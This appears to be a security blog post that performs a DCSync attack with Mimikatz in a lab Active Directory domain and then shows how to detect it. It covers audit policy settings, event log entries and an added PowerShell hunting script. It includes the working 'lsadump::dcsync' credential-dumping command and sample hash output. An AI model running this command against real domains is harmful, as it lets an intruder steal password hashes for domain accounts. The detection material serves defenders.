In this post, I look at how to perform and detect a DCSync attack using Mimikatz. In a DCSync attack, an ordinary computer impersonates a domain controller at the protocol level: it calls the same Directory Replication Service (MS-DRSR) interface, specifically the DRSGetNCChanges request, that real domain controllers use to replicate with each other, and asks for the attributes of one user or of every account in the domain, password hashes included. No server is promoted and nothing is installed on the target; all that is needed is an account holding the "Replicating Directory Changes" and "Replicating Directory Changes All" extended rights on the domain object, which the built-in Administrators group (and therefore Domain Admins, who are members of it) holds by default.
I connected to a workstation as a user with Domain Admin privileges.
C:\Tools\mimikatz_trunk\x64
λ whoami /upn
admin@securitynik.local
Confirming the group membership.
C:\Tools\mimikatz_trunk\x64
λ net group "Domain Admins" /domain
The request will be processed at a domain controller for domain securitynik.local.

Group name     Domain Admins
Comment        Designated administrators of the domain

Members

-------------------------------------------------------------------------------
mysqlsvc                 admin                    Administrator
The command completed successfully.
Before going any further, I configured my Windows Server 2019 domain controller to audit directory service access and replication. The DS Access subcategories are what make the attack visible: "Directory Service Access" produces event 4662, which records the replication extended rights being read on the domain object (the DCSync request itself), and the two replication subcategories produce events such as 4928 for replication partners and naming contexts.
Group Policy Management -> My Domain Policy ("SecurityNik - Default - Domain Policy") -> Computer Configuration -> Advanced Audit Policy Configuration -> Audit Policies -> DS Access:
    Detailed Directory Service Replication : Success and Failure
    Directory Service Access : Success and Failure
    Directory Service Changes : Success and Failure
    Directory Service Replication : Success and Failure
First up, collecting information about a particular user
C:\Tools\mimikatz_trunk\x64
λ mimikatz.exe "lsadump::dcsync /domain:securitynik.local /user:tq" exit

  .#####.   mimikatz 2.2.0 (x64) #19041 May 19 2020 00:48:59
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/

mimikatz(commandline) # lsadump::dcsync /domain:securitynik.local /user:tq
[DC] 'securitynik.local' will be the domain
[DC] 'dc-2019.securitynik.local' will be the DC server
[DC] 'tq' will be the user account

Object RDN           : tq

** SAM ACCOUNT **

SAM Username         : tq
User Principal Name  : tq@securitynik.local
Account Type         : 30000000 ( USER_OBJECT )
User Account Control : 00010200 ( NORMAL_ACCOUNT DONT_EXPIRE_PASSWD )
Account expiration   :
Password last change : 10/16/2021 12:55:37 PM
Object Security ID   : S-1-5-21-2112827174-2190297626-1763567496-1104
Object Relative ID   : 1104

Credentials:
  Hash NTLM: 23e1d10001876b0078a9a779017fc026
    ntlm- 0: 23e1d10001876b0078a9a779017fc026
    ntlm- 1: 23e1d10001876b0078a9a779017fc026
    lm  - 0: 28efaa5798e5b2fedee619ea7e0116d4
    lm  - 1: df03317c4db79c05f4db99852f01f006

Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
    Random Value : 81800db4fa61ba2c6cf2164e34759c2a
...
Looking specifically at the Security event log for events with ID 4928 (Detailed Directory Service Replication), we see the various naming contexts being replicated with SECURITYNIK-WIN as the source DRA. This device is my Windows 10 host and is not a domain controller. Note what the Source DRA value is telling us: it is an NTDS Settings object for SECURITYNIK-WIN under CN=Servers in the Configuration partition, and such an object only exists if the workstation has been registered as a domain controller object, which is what the DCShadow technique (lsadump::dcshadow) does. A plain lsadump::dcsync read does not create any object; its footprint on the real DC is event 4662, showing the requesting account accessing the DS-Replication-Get-Changes and DS-Replication-Get-Changes-All properties on the domain object, and on the wire it is DRSUAPI (MS-DRSR) traffic arriving from a host that is not a DC.
An Active Directory replica source naming context was established.
Destination DRA: CN=NTDS Settings,CN=DC-2019,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=securitynik,DC=local
Source DRA: CN=NTDS Settings,CN=SECURITYNIK-WIN,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=securitynik,DC=local
Source Address: 1151663f-94af-4319-a8ad-435763db3875._msdcs.securitynik.local
Naming Context: CN=Schema,CN=Configuration,DC=securitynik,DC=local
Options: 2147484016
Status Code: 0
An Active Directory replica source naming context was established.
Destination DRA: CN=NTDS Settings,CN=DC-2019,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=securitynik,DC=local
Source DRA: CN=NTDS Settings,CN=SECURITYNIK-WIN,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=securitynik,DC=local
Source Address: 1151663f-94af-4319-a8ad-435763db3875._msdcs.securitynik.local
Naming Context: DC=securitynik,DC=local
Options: 368
Status Code: 0
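Rather than scrolling Event Viewer, the two signals can be pulled straight from the DC's Security log. The PowerShell below is an added example and not part of the original post; it assumes it runs on the domain controller (or against its log) with the RSAT ActiveDirectory module available, and that the audit settings above are in place. The first query surfaces 4662 events where the accessed property is one of the replication extended rights and the subject is not a domain controller computer account, which is the footprint of the lsadump::dcsync request itself. The second query surfaces 4928 events whose Source DRA is not one of the domain's real DCs, matching the SECURITYNIK-WIN entries shown above. The known-DC list is taken from Get-ADDomainController, and the message-text regex for 4928 is based on the event wording reproduced in this post.

```powershell
# Added example (not from the original post): DCSync / rogue-replication-source hunting
# in the Security log of a DC. Assumes the RSAT ActiveDirectory module.
Import-Module ActiveDirectory

$DcNames    = (Get-ADDomainController -Filter *).Name           # e.g. DC-2019
$DcAccounts = $DcNames | ForEach-Object { "$_`$" }                # computer accounts end in $
$ReplGuids  = '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2|' +            # DS-Replication-Get-Changes
              '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2|' +            # DS-Replication-Get-Changes-All
              '89e95b76-444d-4c62-991a-0facbeda640c'               # DS-Replication-Get-Changes-In-Filtered-Set
$Since = (Get-Date).AddHours(-24)

# Signal 1: 4662 where "Properties" lists a replication right and the subject is not a DC.
$DcSync = Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4662; StartTime = $Since } -ErrorAction SilentlyContinue |
    ForEach-Object {
        $x = [xml]$_.ToXml()
        $d = @{}
        foreach ($item in $x.Event.EventData.Data) { $d[$item.Name] = $item.'#text' }   # named EventData fields
        if ($d.Properties -match $ReplGuids -and $DcAccounts -notcontains $d.SubjectUserName) {
            [pscustomobject]@{
                Time    = $_.TimeCreated
                Subject = "$($d.SubjectDomainName)\$($d.SubjectUserName)"
                Object  = $d.ObjectName
                Signal  = 'Replication extended right used by a non-DC account (DCSync)'
            }
        }
    }

# Signal 2: 4928 whose Source DRA is an NTDS Settings object for a host that is not a real DC.
$RogueSource = Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4928; StartTime = $Since } -ErrorAction SilentlyContinue |
    ForEach-Object {
        if ($_.Message -match 'Source DRA:\s+CN=NTDS Settings,CN=([^,]+),') {
            $src = $Matches[1]
            $nc  = if ($_.Message -match 'Naming Context:\s+(\S+)') { $Matches[1] } else { '' }
            if ($DcNames -notcontains $src) {
                [pscustomobject]@{
                    Time    = $_.TimeCreated
                    Subject = $src
                    Object  = $nc
                    Signal  = 'Replica source is not a known domain controller (rogue DC)'
                }
            }
        }
    }

@($DcSync) + @($RogueSource) | Sort-Object Time | Format-Table -AutoSize
```

Against the activity in this post, the first query should return a 4662 for SECURITYNIK\admin against the domain object at the time the lsadump::dcsync command ran, and the second should return the 4928 entries above with SECURITYNIK-WIN as the subject. Excluding DC computer accounts is what keeps normal DC-to-DC replication out of the results; if the domain has an Azure AD Connect or similar synchronisation account that legitimately holds replication rights, add it to the exclusion list rather than loosening the GUID match.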
Looking at the Directory Service log, Event 1548 reads:
During replication, Active Directory Domain Services found the following object or its parent object in a directory partition on the local domain controller that is different from the following directory partition from which changes are being replicated. This can occur when the object or its parent object has been moved across partitions. However, due to replication latency, one of the directory servers has not yet received notification of the move.
Object: CN=tq,OU=SecurityNik-Users,DC=securitynik,DC=local
Object GUID: 7b76ce2a-c5d9-42ec-b246-cba68d5d23ee
Parent object GUID (if available): 9234d83c-d3fc-49c0-8024-2eee57d9179b
Directory partition: CN=Configuration,DC=securitynik,DC=local
Source directory server: 1151663f-94af-4319-a8ad-435763db3875._msdcs.securitynik.local
Replication of this directory partition from this source directory server cannot continue at this time. This condition is transient. An attempt to replicate this directory partition will be tried again later.
Further entries in the same log show the real DC trying, and failing, to resolve and replicate from the bogus partner:
Invalid DNS configuration may be affecting other essential operations on member computers, domain controllers or application servers in this Active Directory Domain Services forest, including logon authentication or access to network resources. You should immediately resolve this DNS configuration error so that this domain controller can resolve the IP address of the source domain controller using DNS.
Alternate server name: SECURITYNIK-WIN10.securitynik.local
Failing DNS host name: 1151663f-94af-4319-a8ad-435763db3875._msdcs.securitynik.local
The attempt to establish a replication link for the following writable directory partition failed.
Directory partition: CN=Configuration,DC=securitynik,DC=local
Source directory service: CN=NTDS Settings,CN=SECURITYNIK-WIN,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=securitynik,DC=local
Source directory service address: 1151663f-94af-4319-a8ad-435763db3875._msdcs.securitynik.local
Intersite transport (if any):
The attempt to establish a replication link for the following writable directory partition failed.
Directory partition: CN=Configuration,DC=securitynik,DC=local
Source directory service: CN=NTDS Settings,CN=SECURITYNIK-WIN,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=securitynik,DC=local
Source directory service address: 1151663f-94af-4319-a8ad-435763db3875._msdcs.securitynik.local
Intersite transport (if any):
There were quite a few of these errors in the Directory Service log. A domain controller repeatedly failing to replicate from a source that is not one of your domain controllers, with a _msdcs DNS name that does not resolve, is itself a signal worth investigating: the replication topology should only ever contain DCs you built.
References:
https://www.blackhat.com/docs/us-14/materials/us-14-Duckwall-Abusing-Microsoft-Kerberos-Sorry-You-Guys-Don't-Get-It.pdf
https://stealthbits.com/blog/dcshadow-attacking-active-directory-rogue-dcs/
https://pentestlab.blog/2018/04/16/dcshadow/
https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4928